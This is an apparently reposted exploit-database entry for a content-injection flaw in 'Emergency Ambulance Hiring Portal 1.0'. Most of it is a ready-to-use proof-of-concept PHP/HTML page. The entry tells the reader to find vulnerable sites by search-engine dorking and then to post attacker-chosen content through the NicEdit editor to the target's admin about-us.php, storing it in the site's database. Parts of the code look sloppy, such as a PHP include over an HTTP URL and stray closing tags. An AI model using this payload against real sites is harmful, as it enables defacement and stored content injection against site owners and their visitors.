Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection exploit

2 months ago 34
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181442 ============================================================================================================================================= | # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Part 01 : about-us.php [+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . [+] Line 2 : Make sure to include your database connection here [+] Line 44 : Send the form data using fetch API (Set your target url) [+] save payload as poc.php in your localhost path . [+] payload : <?php include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here if (isset($_POST['submit'])) { $pagetitle = $_POST['pagetitle']; $pagedes = $con->real_escape_string($_POST['pagedes']); $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'"); if ($query) { echo '<script>alert("About Us has been updated.")</script>'; } else { echo '<script>alert("Something Went Wrong. Please try again.")</script>'; } exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>indoushka | Update About Us Content</title> <!-- NicEdit Script --> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script> <script type="text/javascript"> // Apply NicEdit to all text areas when the DOM is loaded bkLib.onDomLoaded(nicEditors.allTextAreas); // Function to handle form submission using JavaScript function submitForm(event) { event.preventDefault(); // Prevent default form submission const pagetitle = document.getElementById('pagetitle').value; const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content // Prepare the form data to be sent const formData = new FormData(); formData.append('pagetitle', pagetitle); formData.append('pagedes', pagedes); formData.append('submit', true); // Send the form data using fetch API fetch('http://127.0.0.1/eahp/admin/about-us.php', { method: 'POST', body: formData, }) .then(response => response.text()) .then(data => { alert('About Us content has been updated successfully.'); console.log(data); // Handle the response from the server }) .catch(error => { console.error('Error:', error); }); } </script> <style> /* Center the form container */ .editor-container { max-width: 800px; margin: 0 auto; /* Center horizontally */ padding: 20px; text-align: center; /* Center the content inside */ } /* Ensure the textarea takes the full width */ #pagedes { width: 100%; height: 300px; margin: 0 auto; } </style> </head> <body> <div id="app"> <div class="app-content"> <div class="main-content"> <div class="wrap-content container" id="container"> <!-- Page Title Section --> <section id="page-title"> <div class="row"> <div class="col-sm-8"> <h1 class="mainTitle">Update the About Us Content</h1> </div> </li> </ol> </div> </section> <!-- Form Section --> <div class="container-fluid container-fullw bg-white"> <div class="row"> <div class="col-md-12"> <!-- Centering the form using a wrapper div --> <div class="editor-container"> <form class="forms-sample" method="post" onsubmit="submitForm(event);"> <div class="form-group"> <label for="pagetitle">Page Title</label> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required> </div> <div class="form-group"> <label for="pagedes">Page Description</label> <!-- NicEdit will enhance this textarea --> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea> </div> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button> </form> </div> </div> </div> </div> <!-- End Form Section --> </div> </div> </div> </div> <!-- Footer --> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================
Read Entire Article